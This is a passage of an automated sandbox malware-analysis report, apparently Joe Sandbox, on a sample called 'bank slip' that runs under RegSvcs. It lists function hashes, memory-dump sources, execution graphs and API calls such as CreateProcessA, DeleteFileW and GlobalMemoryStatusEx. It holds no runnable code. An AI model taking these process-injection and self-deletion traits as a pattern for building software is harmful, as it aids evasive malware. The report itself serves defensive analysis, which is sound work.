                                                                      • Opcode ID: d80f18caa57ec7c23e8092c66e61002b31f7c1951ef46221ba089b40fb038034
                                                                      • Instruction ID: ea27154e21bb76a085d47a93dd81912e6fabfb7bf9edb3dc778b18c8b1100a2e
                                                                      • Opcode Fuzzy Hash: d80f18caa57ec7c23e8092c66e61002b31f7c1951ef46221ba089b40fb038034
                                                                      • Instruction Fuzzy Hash: 7B2129B1504208EFDB05DF14D5C0B36BBA6FB84314F34C96DDA094B255C33AD816CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009FD006 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09a3e73eb66ab20ed9b9b8e411dda0d4ec96d512644c1e1b494f94c871a43e52
                                                                      • Instruction ID: f3bb2db35c14d5c0363ce479c3debc747be75173abdc80d9f30587b2ab219b1f
                                                                      • Opcode Fuzzy Hash: 09a3e73eb66ab20ed9b9b8e411dda0d4ec96d512644c1e1b494f94c871a43e52
                                                                      • Instruction Fuzzy Hash: 43219F755093C48FCB02CF24D994715BF72EB46314F28C5EAD9498F6A7C33A980ACB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0080D3D3 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction ID: f4ef10ef8a2e2edd498c25f4017fd3a96ad4c4e149f14d14da1be9204c7cbd87
                                                                      • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction Fuzzy Hash: 1A110372504740CFDB02CF44D9C4B16BF71FB94324F24C2A9D8094B656C33AE85ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009FD1CF Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: fd4150a17dda434ad6de1dd3f1891a0f632db259bc4ccb88519c558d02bceee8
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: C411DD75904284DFDB02CF10D5C4B25FBB2FB84324F24C6AED9494B696C33AD81ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0080D745 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00f1b6725b5e9545d04c737fccf57e9565c2d506985314c25841b0de2d429915
                                                                      • Instruction ID: 06f0b087efcf4ca69e2354fc6283788954e619b0dbad35b9addad16d0c23b06e
                                                                      • Opcode Fuzzy Hash: 00f1b6725b5e9545d04c737fccf57e9565c2d506985314c25841b0de2d429915
                                                                      • Instruction Fuzzy Hash: D60126710053449AE7508EA9CDC4B27FFA8EF81324F28C91AED088A2C6C3399840CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0080D744 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00337754a9a171314542e8976623a0f96d524ef1b2af9ca55db0c22245292c17
                                                                      • Instruction ID: 7d1105394077bf274ec8871485bd17b87a244ba75bbe6467d5c4fec66108ad08
                                                                      • Opcode Fuzzy Hash: 00337754a9a171314542e8976623a0f96d524ef1b2af9ca55db0c22245292c17
                                                                      • Instruction Fuzzy Hash: 9DF06D72404344AEE7108E1ADD88B62FFA8EB91734F18C45AED088A2D6C3799844CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 068A6A00 Relevance: 6.0, Strings: 4, Instructions: 1015COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TJhq$Tecq$pgq$xbfq
                                                                      • API String ID: 0-3743893911
                                                                      • Opcode ID: 9928fecb5adca0e979cbc67bd553caf068b2ece1a212cf2c1c27287210327fc7
                                                                      • Instruction ID: 59f67c301c82e5e269983573b8fedabcc65fe89b7a39e277480eee3297a49779
                                                                      • Opcode Fuzzy Hash: 9928fecb5adca0e979cbc67bd553caf068b2ece1a212cf2c1c27287210327fc7
                                                                      • Instruction Fuzzy Hash: 66B2A075E00628DFDB64CF69C984ADDBBB2BF89304F1581E9D509AB225DB319E81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA0920 Relevance: .3, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09aa988843d681b25ba97ea45cf1e8b30ca7043189146b8f25ea30f21d8189be
                                                                      • Instruction ID: d6d62bea6f2a1a577bf256cf836c2c92dfc347bb652b0e243776b67691a41c49
                                                                      • Opcode Fuzzy Hash: 09aa988843d681b25ba97ea45cf1e8b30ca7043189146b8f25ea30f21d8189be
                                                                      • Instruction Fuzzy Hash: 1C129EB8C01746ABE710CF65E94C18D3AB1FBE5328B904219D3616A2E5DBBE194BCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 068AAB60 Relevance: .3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39372efafb06b24f86d8979883cb0137f593588802102fd81cb045a358a2f577
                                                                      • Instruction ID: 84846bc883b8041a47c707c7c29f0c4b29ef8b1fedf221028283b6179f328c65
                                                                      • Opcode Fuzzy Hash: 39372efafb06b24f86d8979883cb0137f593588802102fd81cb045a358a2f577
                                                                      • Instruction Fuzzy Hash: 4DD10C31D20B5ACACB01EB64D950A9DB3B1FF95300F20C79AE50977264EB706AD9CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259E47C Relevance: .3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b63149addf88eb91595f4a25579ccd1f6d8b23ee3485d9fed87d29f6bf89aa4
                                                                      • Instruction ID: 2f45c11fc2d166003a4c274648467c697a79a0787fe021b65f23db1cbb8016ae
                                                                      • Opcode Fuzzy Hash: 8b63149addf88eb91595f4a25579ccd1f6d8b23ee3485d9fed87d29f6bf89aa4
                                                                      • Instruction Fuzzy Hash: E6A15B32A10216CFCF05DFA4C84459EBBB2FFC9300B15856AE805AB265EB35ED46CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA0910 Relevance: .2, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea99c03db26ccba008304b3b8dd542e3aa61a630c03f6e9a924f7cac0365f68a
                                                                      • Instruction ID: b6cb2a4cb2b6b2ffe6c435e1487f4189a88221abad14a07c0739a981f1ff4837
                                                                      • Opcode Fuzzy Hash: ea99c03db26ccba008304b3b8dd542e3aa61a630c03f6e9a924f7cac0365f68a
                                                                      • Instruction Fuzzy Hash: 9EC1E4B8C01746ABD710CF65E94818D7BB1FFE5328B604219D3616B2E5DBBA184BCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 068AC190 Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 597ec99cb6010c5a76f3ed531b38d603c03a77b1a6e9b4b184d165a3792b5251
                                                                      • Instruction ID: 852853683044281797ec9877b1dd6af15a189c6bbc5b409f9b82bb465a1763c7
                                                                      • Opcode Fuzzy Hash: 597ec99cb6010c5a76f3ed531b38d603c03a77b1a6e9b4b184d165a3792b5251
                                                                      • Instruction Fuzzy Hash: A151D274E052198FDB44DFAAD5809AEFBF2FF88300F24D126E819A7255D730A942CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 068A0040 Relevance: .1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f66c315014ee156acb95114b5aaabb82b7a42e10fdf6b4480f137db20ba23c
                                                                      • Instruction ID: 8ed65e08258abfcd48f4fcdb4f13800afdc4891b74b1b6a1636b8f2ab51eccb8
                                                                      • Opcode Fuzzy Hash: 73f66c315014ee156acb95114b5aaabb82b7a42e10fdf6b4480f137db20ba23c
                                                                      • Instruction Fuzzy Hash: E85184B4E016188FEB68CF2AD95479DBAF3AFC8204F14C1EAD40DA7264DB710A95CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 068A003F Relevance: .1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 46e02f39ec5a5673a5b654ad8f61a36382896fb7c6b2f03fb48d67b3fc0f04d6
                                                                      • Instruction ID: 84c2a38f15b703052d9f621e47c04b9fd8474e3eb66a9657e06ed356a9ee06c3
                                                                      • Opcode Fuzzy Hash: 46e02f39ec5a5673a5b654ad8f61a36382896fb7c6b2f03fb48d67b3fc0f04d6
                                                                      • Instruction Fuzzy Hash: F33147B1D016188BEB68CF6BDD4478EFAF7AFC8204F14C1AAD40CAA254EB7509958F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:13.8%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 28282 639e4c8 28283 639e4fd 28282->28283 28284 639e4d5 28282->28284 28290 639d16c 28283->28290 28286 639e51e 28288 639e5e6 GlobalMemoryStatusEx 28289 639e616 28288->28289 28291 639e5a0 GlobalMemoryStatusEx 28290->28291 28293 639e51a 28291->28293 28293->28286 28293->28288 28294 12c7350 28295 12c7396 DeleteFileW 28294->28295 28297 12c73cf 28295->28297

                                                                      Executed Functions

                                                                      Function 012C7348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1241 12c7348-12c739a 1243 12c739c-12c739f 1241->1243 1244 12c73a2-12c73cd DeleteFileW 1241->1244 1243->1244 1245 12c73cf-12c73d5 1244->1245 1246 12c73d6-12c73fe 1244->1246 1245->1246
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 012C73C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2089275349.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_12c0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID: u
                                                                      • API String ID: 4033686569-4067256894
                                                                      • Opcode ID: 366b76a074f9a3a8addb4d5c173792b42a9328506fbeee389bc2405dc9c1fecd
                                                                      • Instruction ID: 9539ef3a891afa15e9ffffce84c5f91a89cf6af84a78fb6991b461868c17863c
                                                                      • Opcode Fuzzy Hash: 366b76a074f9a3a8addb4d5c173792b42a9328506fbeee389bc2405dc9c1fecd
                                                                      • Instruction Fuzzy Hash: 742135B1C1065A9FCB14CF9AD445BEEFBF0BF48320F10826AD918A7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0639E4C8 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2787 639e4c8-639e4d3 2788 639e4fd-639e51c call 639d16c 2787->2788 2789 639e4d5-639e4fc call 639d160 2787->2789 2795 639e51e-639e521 2788->2795 2796 639e522-639e581 2788->2796 2803 639e583-639e586 2796->2803 2804 639e587-639e614 GlobalMemoryStatusEx 2796->2804 2808 639e61d-639e645 2804->2808 2809 639e616-639e61c 2804->2809 2809->2808
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56284fa46c89c456e2a716b1f0fea5dedc5f096a0be44c055cd1a420957371e8
                                                                      • Instruction ID: 6d0614fae29ecfec2f57043bac189ebe471fd48a240247f055a99cfb638e09c2
                                                                      • Opcode Fuzzy Hash: 56284fa46c89c456e2a716b1f0fea5dedc5f096a0be44c055cd1a420957371e8
                                                                      • Instruction Fuzzy Hash: A6412672E043598FCB10DF69D8046AEBFF5AF8A310F1585AAD404A7341EB74A845CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012C7350 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2812 12c7350-12c739a 2814 12c739c-12c739f 2812->2814 2815 12c73a2-12c73cd DeleteFileW 2812->2815 2814->2815 2816 12c73cf-12c73d5 2815->2816 2817 12c73d6-12c73fe 2815->2817 2816->2817
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 012C73C0
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2089275349.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_12c0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 63de94153e15bfa01528f17c8ca7ce15ce568920ab5f5daf9d1fc38725015149
                                                                      • Instruction ID: c22c33e0a310a560fc3ec8c1440de45d07ac2656fb964d34ecc27e68fdf14ca2
                                                                      • Opcode Fuzzy Hash: 63de94153e15bfa01528f17c8ca7ce15ce568920ab5f5daf9d1fc38725015149
                                                                      • Instruction Fuzzy Hash: 341144B1C1061A9BCB14CF9AD445B9EFBF4FF48720F11822AD918A7240D338A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0639D16C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2820 639d16c-639e614 GlobalMemoryStatusEx 2823 639e61d-639e645 2820->2823 2824 639e616-639e61c 2820->2824 2824->2823
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0639E51A), ref: 0639E607
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 6190796129e2b0b8f5d8a5c12bd0fbf5190cd35283f16bc997f4d0fd76e4aec5
                                                                      • Instruction ID: f837217ff774cb02bf3af2f0883bf6dcd3efbc05cc79a7e6c37b795140fffd18
                                                                      • Opcode Fuzzy Hash: 6190796129e2b0b8f5d8a5c12bd0fbf5190cd35283f16bc997f4d0fd76e4aec5
                                                                      • Instruction Fuzzy Hash: CD1103B1C006599BCB10DF9AC444B9EFBF4AF48310F11816AE918A7240D378A944CFE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0639E598 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2827 639e598-639e5de 2828 639e5e6-639e614 GlobalMemoryStatusEx 2827->2828 2829 639e61d-639e645 2828->2829 2830 639e616-639e61c 2828->2830 2830->2829
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0639E51A), ref: 0639E607
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: ad28ec8215254bf8428e1eb8f92a88743ddb505516a137c0421a904cd30abe44
                                                                      • Instruction ID: 47031c59d19f6539e1912ff2b51bae6160a204735522e52668747acec87bc53f
                                                                      • Opcode Fuzzy Hash: ad28ec8215254bf8428e1eb8f92a88743ddb505516a137c0421a904cd30abe44
                                                                      • Instruction Fuzzy Hash: 5A1142B6C0021A9BCB00CF9AC544BDEFBF4AF48321F11816AD428B7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:8.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:67
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 21819 7623440 21820 7623466 21819->21820 21821 76235cb 21819->21821 21820->21821 21823 76218f0 21820->21823 21824 76236c0 PostMessageW 21823->21824 21825 762372c 21824->21825 21825->21820 21826 544dbe0 DuplicateHandle 21827 544dc76 21826->21827 21761 7620125 21766 76221a0 21761->21766 21770 7622256 21761->21770 21775 76221b0 21761->21775 21762 76200d1 21767 76221b0 21766->21767 21768 76221ee 21767->21768 21779 7622635 21767->21779 21768->21762 21771 76221e4 21770->21771 21773 7622259 21770->21773 21772 76221ee 21771->21772 21774 7622635 CreateProcessA 21771->21774 21772->21762 21773->21762 21774->21772 21776 76221ca 21775->21776 21777 76221ee 21776->21777 21778 7622635 CreateProcessA 21776->21778 21777->21762 21778->21777 21782 74bfc30 21779->21782 21783 74bfcb9 21782->21783 21783->21783 21784 74bfe1e CreateProcessA 21783->21784 21785 74bfe7b 21784->21785 21786 544b618 21787 544b627 21786->21787 21789 544b700 21786->21789 21790 544b721 21789->21790 21791 544b744 21789->21791 21790->21791 21797 544b9a8 21790->21797 21801 544b999 21790->21801 21791->21787 21792 544b73c 21792->21791 21793 544b948 GetModuleHandleW 21792->21793 21794 544b975 21793->21794 21794->21787 21798 544b9bc 21797->21798 21799 544b9e1 21798->21799 21805 544ac60 21798->21805 21799->21792 21802 544b9bc 21801->21802 21803 544b9e1 21802->21803 21804 544ac60 LoadLibraryExW 21802->21804 21803->21792 21804->21803 21806 544bb88 LoadLibraryExW 21805->21806 21808 544bc01 21806->21808 21808->21799 21809 544d998 21810 544d9de GetCurrentProcess 21809->21810 21812 544da30 GetCurrentThread 21810->21812 21815 544da29 21810->21815 21813 544da6d GetCurrentProcess 21812->21813 21816 544da66 21812->21816 21814 544daa3 GetCurrentThreadId 21813->21814 21818 544dafc 21814->21818 21815->21812 21816->21813 21828 5444668 21829 5444672 21828->21829 21831 5444759 21828->21831 21832 544477d 21831->21832 21836 5444868 21832->21836 21840 5444859 21832->21840 21838 544488f 21836->21838 21837 544496c 21837->21837 21838->21837 21844 54444e0 21838->21844 21841 5444868 21840->21841 21842 54444e0 CreateActCtxA 21841->21842 21843 544496c 21841->21843 21842->21843 21845 54458f8 CreateActCtxA 21844->21845 21847 54459bb 21845->21847

                                                                      Executed Functions

                                                                      Function 0544D998 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 294 544d998-544da27 GetCurrentProcess 298 544da30-544da64 GetCurrentThread 294->298 299 544da29-544da2f 294->299 300 544da66-544da6c 298->300 301 544da6d-544daa1 GetCurrentProcess 298->301 299->298 300->301 302 544daa3-544daa9 301->302 303 544daaa-544dac2 301->303 302->303 307 544dacb-544dafa GetCurrentThreadId 303->307 308 544db03-544db65 307->308 309 544dafc-544db02 307->309 309->308
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0544DA16
                                                                      • GetCurrentThread.KERNEL32 ref: 0544DA53
                                                                      • GetCurrentProcess.KERNEL32 ref: 0544DA90
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0544DAE9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 4c41354c0471248be94f08c0ae910563ffba70f7c24674e45477ce3ac4edc909
                                                                      • Instruction ID: 13cf8d1d9cec15f1787919fb958c2c0a30a606986dfd0b6294aedd43ed36a64c
                                                                      • Opcode Fuzzy Hash: 4c41354c0471248be94f08c0ae910563ffba70f7c24674e45477ce3ac4edc909
                                                                      • Instruction Fuzzy Hash: 695143B0D103098FDB14DFAAD548BEEBBF1BB88314F24845AE409A7390DB349984CF65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 074BFC30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 337 74bfc30-74bfcc5 339 74bfcfe-74bfd1e 337->339 340 74bfcc7-74bfcd1 337->340 347 74bfd20-74bfd2a 339->347 348 74bfd57-74bfd86 339->348 340->339 341 74bfcd3-74bfcd5 340->341 342 74bfcf8-74bfcfb 341->342 343 74bfcd7-74bfce1 341->343 342->339 345 74bfce3 343->345 346 74bfce5-74bfcf4 343->346 345->346 346->346 349 74bfcf6 346->349 347->348 350 74bfd2c-74bfd2e 347->350 354 74bfd88-74bfd92 348->354 355 74bfdbf-74bfe79 CreateProcessA 348->355 349->342 352 74bfd51-74bfd54 350->352 353 74bfd30-74bfd3a 350->353 352->348 356 74bfd3e-74bfd4d 353->356 357 74bfd3c 353->357 354->355 358 74bfd94-74bfd96 354->358 368 74bfe7b-74bfe81 355->368 369 74bfe82-74bff08 355->369 356->356 359 74bfd4f 356->359 357->356 360 74bfdb9-74bfdbc 358->360 361 74bfd98-74bfda2 358->361 359->352 360->355 363 74bfda6-74bfdb5 361->363 364 74bfda4 361->364 363->363 365 74bfdb7 363->365 364->363 365->360 368->369 379 74bff0a-74bff0e 369->379 380 74bff18-74bff1c 369->380 379->380 381 74bff10 379->381 382 74bff1e-74bff22 380->382 383 74bff2c-74bff30 380->383 381->380 382->383 384 74bff24 382->384 385 74bff32-74bff36 383->385 386 74bff40-74bff44 383->386 384->383 385->386 389 74bff38 385->389 387 74bff56-74bff5d 386->387 388 74bff46-74bff4c 386->388 390 74bff5f-74bff6e 387->390 391 74bff74 387->391 388->387 389->386 390->391
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074BFE66
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134776693.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_74b0000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: a319cf216dbf1e2f3adbc7f54410bef07d1f676eadd2d26a425049fe960f5dec
                                                                      • Instruction ID: 02b4e181f4b57bb81b264c2106b8368c294f5a80cdd64eee7a03f20c262b296a
                                                                      • Opcode Fuzzy Hash: a319cf216dbf1e2f3adbc7f54410bef07d1f676eadd2d26a425049fe960f5dec
                                                                      • Instruction Fuzzy Hash: C5913DB1D0025ACFDB20DFA8CC417DEBBB6BB49310F14856AD819A7250DB749989CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0544B700 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
